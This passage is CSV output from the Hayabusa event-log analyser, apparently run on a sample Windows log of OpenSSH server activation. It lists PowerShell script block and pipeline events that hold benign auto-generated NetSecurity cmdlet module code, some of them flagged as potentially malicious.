$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.217 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.220 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.222 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.250 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 